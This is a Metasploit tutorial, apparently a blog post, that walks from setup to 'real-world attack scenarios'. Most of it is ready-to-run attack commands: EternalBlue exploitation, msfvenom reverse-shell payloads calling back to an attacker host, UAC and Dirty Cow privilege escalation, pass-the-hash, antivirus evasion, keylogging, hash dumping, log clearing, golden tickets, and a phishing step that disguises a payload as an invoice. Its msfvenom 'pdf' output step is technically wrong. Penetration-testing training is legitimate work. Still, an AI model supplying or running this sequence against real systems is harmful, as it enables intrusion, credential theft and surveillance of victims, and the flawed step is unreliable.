The Ultimate Metasploit Mastery Guide Basic to Advance Part-1

 

The Ultimate Metasploit Mastery Guide: From Basics to Advanced Exploitation

Introduction

Metasploit is the most widely used penetration testing framework, offering powerful tools for exploit development, vulnerability scanning, post-exploitation, and automation. Whether you're a beginner or an advanced security professional, this guide will take you from basic commands to advanced real-world attack scenarios.

---

Table of Contents

1. Getting Started with Metasploit

2. Basic Commands & Exploitation

3. Payloads & Meterpreter

4. Post-Exploitation Techniques

5. Advanced Exploitation & Evasion

6. Automation & Scripting

7. Real-World Attack Scenarios

8. Final Tips & Best Practices

---

1. Getting Started with Metasploit

What is Metasploit?

Metasploit is an open-source penetration testing framework that provides:

• Exploits (Code to take advantage of vulnerabilities)

• Payloads (Malicious code executed after exploitation)

• Auxiliary modules (Scanners, fuzzers, DoS attacks)

• Post-exploitation tools (Privilege escalation, pivoting, data exfiltration)

Installation & Setup

bash

# Kali Linux (Pre-installed)
msfconsole

# Ubuntu/Debian
sudo apt install metasploit-framework
msfdb init
msfconsole

---

2. Basic Commands & Exploitation

Essential Metasploit Commands

Command	Description
msfconsole	Start Metasploit
search <keyword>	Find modules (e.g., search eternalblue)
use <module>	Load a module (e.g., use exploit/windows/smb/ms17_010_eternalblue)
show options	View required settings
set <option> <value>	Configure module (e.g., set RHOSTS 192.168.1.100)
run or exploit	Launch the exploit
sessions -l	List active sessions
sessions -i <ID>	Interact with a session

Step-by-Step Exploitation

1. Search for an exploit:

   bash

   search ms17_010

2. Load and configure the exploit:

   bash

   use exploit/windows/smb/ms17_010_eternalblue
   set RHOSTS 192.168.1.100
   set LHOST 192.168.1.5

3. Set a payload (optional):

   bash

   set payload windows/x64/meterpreter/reverse_tcp

4. Launch the attack:

   bash

   exploit

---

3. Payloads & Meterpreter

Types of Payloads

Payload Type	Example	Use Case
Staged	windows/meterpreter/reverse_tcp	Evades detection
Non-staged	windows/shell_reverse_tcp	Faster execution
Meterpreter	windows/x64/meterpreter_reverse_https	Advanced post-exploitation

Generating Payloads with msfvenom

bash

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.5 LPORT=4444 -f exe -o payload.exe

Meterpreter Essentials

Command	Description
sysinfo	Get system details
getuid	Check current user
ps	List running processes
migrate <PID>	Move to another process
hashdump	Dump password hashes
keyscan_start	Start keylogger
screenshot	Capture screen
clearev	Clear logs

---

4. Post-Exploitation Techniques

Privilege Escalation

Windows

bash

# Check for local exploits
run post/multi/recon/local_exploit_suggester

# Bypass UAC
use exploit/windows/local/bypassuac_eventvwr
set SESSION 1
exploit

Linux

bash

# Check SUID binaries
run post/linux/gather/enum_suid

# Exploit Dirty Cow
use exploit/linux/local/dirtycow
set SESSION 1
exploit

Lateral Movement

Technique	Command
Pass-the-Hash	use exploit/windows/smb/psexec + set SMBPass <NTLM>
RDP Hijacking	run post/windows/manage/rdp_hijack

---

5. Advanced Exploitation & Evasion

Custom Exploit Development

1. Copy a template:

   bash

   cp /usr/share/metasploit-framework/modules/exploits/example.rb ~/.msf4/modules/exploits/custom/my_exploit.rb

2. Edit the exploit (Define target, bad characters, etc.)

3. Reload Metasploit:

   bash

   reload_all

AV & EDR Evasion

Technique	Command
Payload Encoding	msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 5
HTTPS Payload	set payload windows/meterpreter/reverse_https
Process Injection	migrate explorer.exe

---

6. Automation & Scripting

Resource Scripts (.rc Files)

bash

# auto_exploit.rc
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.1.100
set LHOST 192.168.1.5
exploit

Run with:

bash

msfconsole -r auto_exploit.rc

Metasploit API (Python Automation)

python

import msfrpc
client = msfrpc.Msfrpc({})
client.login('msf', 'password')
client.call('console.write', [console_id, 'use exploit/windows/smb/ms17_010_eternalblue\n'])

---

7. Real-World Attack Scenarios

Scenario 1: Phishing + Meterpreter Payload

1. Generate a malicious PDF:

   bash

   msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.5 -f pdf -o invoice.pdf

2. Send phishing email with attachment.

3. Handle the callback:

   bash

   use exploit/multi/handler
   set payload windows/meterpreter/reverse_tcp
   exploit

Scenario 2: Active Directory Exploitation

1. Dump hashes with Mimikatz:

   bash

   load kiwi
   lsa_dump_sam

2. Golden Ticket Attack:

   bash

   golden_ticket_create -d <domain> -k <krbtgt_hash> -u <fake_user> -s <SID>

---

8. Final Tips & Best Practices

✅ Always update Metasploit: msfupdate
✅ Use check before exploiting: check
✅ Automate repetitive tasks (.rc scripts, Python API)
✅ Practice legally (TryHackMe, HackTheBox, VulnHub)

---

Conclusion

This guide covers everything from basic commands to advanced exploitation. Whether you're a beginner or an expert, mastering Metasploit will significantly enhance your penetration testing skills.

What’s next?

• Try HackTheBox machines to practice.

• Explore custom exploit development.

• Learn C2 frameworks (Cobalt Strike, Sliver) for advanced red teaming.

🚀 Happy Hacking! 🚀